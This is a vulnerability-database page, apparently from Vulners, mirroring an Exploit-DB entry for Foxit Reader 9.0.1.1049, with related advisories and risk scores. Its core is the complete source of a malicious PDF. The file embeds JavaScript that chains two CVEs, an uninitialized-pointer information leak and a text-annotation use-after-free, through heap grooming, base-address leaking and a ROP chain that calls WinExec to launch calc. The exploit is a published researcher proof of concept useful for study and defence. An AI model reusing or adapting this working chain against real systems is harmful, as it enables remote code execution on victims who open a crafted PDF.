Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Foxit Reader 9.0.1.1049 - Remote Code Execution

🗓️ 25 Jun 2018 00:00:00Reported by mr_meType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 71 Views

Foxit Reader 9.0.1.1049 Remote Code Execution from PDF fil

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Foxit Reader 9.0.1.1049 - Remote Code Execution Exploit
25 Jun 201800:00
zdt
0day.today		Foxit PDF Reader 9.0.1.1049 Pointer Overwrite Use-After-Free Exploit
24 Aug 201800:00
zdt
0day.today		Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Exploit
27 Nov 202000:00
zdt
Circl		CVE-2018-9948
25 Jun 201800:00
circl
Circl		CVE-2018-9958
25 Jun 201800:00
circl
CNVD		Foxit Reader Information Disclosure Vulnerability (CNVD-2018-10081)
28 Apr 201800:00
cnvd
CNVD		Foxit Reader Text Annotations Remote Code Execution Vulnerability
28 Apr 201800:00
cnvd
Check Point Advisories		Foxit Reader PDF Use After Free Code Execution (CVE-2018-9948)
5 Jul 201800:00
checkpoint_advisories
Check Point Advisories		Foxit Reader Annotations Point Use After Free (CVE-2018-9958)
2 Feb 202000:00
checkpoint_advisories
CVE		CVE-2018-9948
17 May 201815:00
cve
Rows per page
%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 
2 0 obj
<</S /JavaScript /JS (

/*
Foxit Reader Remote Code Execution Exploit
==========================================

Written by: Steven Seeley (mr_me) of Source Incite
Date: 22/06/2018
Technical details: https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html
Download: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
Tested on:
    1. Windows 7 Ultimate x86 build 6.1.7601 sp1
    2. Windows 10 Pro x86 v1803 build 10.0.17134
Vulnerabilities leveraged:
    1. CVE-2018-9948
    2. CVE-2018-9958
*/

var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];

function prepare_heap(size){
    /*
        This function prepares the heap state between allocations
        and frees to get a predictable memory address back. 
    */
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}
	
function gc() {
    /*
        This is a simple garbage collector, written by the notorious @saelo
        Greetz, mi amigo.
    */
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

function alloc_at_leak(){
    /*
        This is the function that allocates at the leaked address
    */
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}

function control_memory(){
    /*
        This is the function that fills the memory address that we leaked
    */
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}

function leak_vtable(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found by: bit from meepwn team
    */

    // alloc
    var a = this.addAnnot({type: "Text"});

    // free
    a.destroy();
    gc();
	
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);

    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    // leak the vtable
    var leaked = stolen[0] & 0xffff0000;

    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    foxit_base = leaked - 0x01f50000;
}

function leak_heap_chunk(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found by: bit from meepwn team
    */

    // alloc
    var a = this.addAnnot({type: "Text"});
	
    // free
    a.destroy();
	
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);
		
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    
    // alloc at the freed location
    alloc_at_leak();
    
    // leak a heap chunk of size 0x40
    heap_ptr = stolen[1];
}

function reclaim(){
    /*
        This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
        All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    */

    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);

        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;              // junk
        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
        rop[0x04] = 0xffffffff;              // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
        rop[0x0c] = 0x636c6163;              // calc
        rop[0x0d] = 0x00000000;              // adios, amigo

        for (var j = 0x0e; j < rop.length; j++) {
            rop[j] = 0x71727374;
        }
    }
}

function trigger_uaf(){
    /*
        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
        Found by: Steven Seeley (mr_me) of Source Incite
    */

    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{ 
            get: function () {

                // free
                that.getAnnot(0, "uaf").destroy();

                // reclaim freed memory
                reclaim();
                return 1; 
            }
        }
    });

    // re-use
    a.point = arr;
}

function main(){

    // 1. Leak a heap chunk of size 0x40
    leak_heap_chunk();

    // 2. Leak vtable and calculate the base of Foxit Reader
    leak_vtable();

    // 3. Then fill the memory region from step 1 with a stack pivot
    control_memory();

    // 4. Trigger the uaf, reclaim the memory, pivot to rop and win
    trigger_uaf();
}

if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}

)>> trailer <</Root 1 0 R>>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2018 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 26.8
CVSS 38.8
EPSS0.87256
foxit readerremote code executionpdfwindowsvulnerability
71